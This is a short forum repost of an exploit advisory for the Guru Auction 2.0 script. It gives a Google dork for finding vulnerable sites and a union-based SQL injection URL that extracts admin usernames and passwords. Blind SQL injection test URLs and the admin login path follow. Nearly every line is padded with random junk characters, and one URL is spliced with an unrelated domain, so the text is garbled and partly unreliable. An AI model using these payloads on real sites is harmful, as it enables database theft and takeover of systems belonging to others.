Guru Auction 2.0 Multiple SQL Injection Vulnerabilities- g4 d" ~1 ?4 U" A$ I' n; J0 I
) c3 s" {* ~' |& q- [作者 : v3n0m
/ i) B, w* u% l0 F7 B( P; Q应用 : Guru Auction 2.0
# e, N4 M) Z2 P) X$ h- kPrice : $49; m/ n) \( {7 k3 w" ]
Vendor : http://www.guruscript.com/
" J# Y: o* G( R. b4 E W6 rGoogle Dork : inurl:subcat.php?cate_id=
% ~* @) @1 y! g% V1 V4 r" ^
% b% H! L# ~* `! N. G( I& G* {5 F0 v% }: [SQLi p0c:
0 w2 \4 G7 [% T, P+ X~~~~~~~~~~- A$ j4 |, M& m, l3 U
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
5 w) q# g \* V: a* Z 5 |% }. W1 j- C, F) ~
' T# f2 p/ z8 q" g) ]4 n& l6 ]盲注 p0c:* t+ _. V; v; Z z
~~~~~~~~~~
0 [" W! C# E0 P7 Z* b* L+ @ [http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true$ k% v2 _* ~/ q- O; n. U7 n" u( y
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false8 f, d; k8 A& [/ h) V! P9 K$ D% Z
+ L0 |- t0 T, D
管理登录入口:
: f6 q5 I; X5 E5 T) @3 F W$ \# g( Q~~~~~~~~~~0 _4 \/ ~1 o- m& J2 a/ g9 U
http://domain.tld/[path]/admin/1 O6 A4 L3 {( E- U; S( |. s
|
发表于 2012-12-31 09:24:05
收藏
支持
反对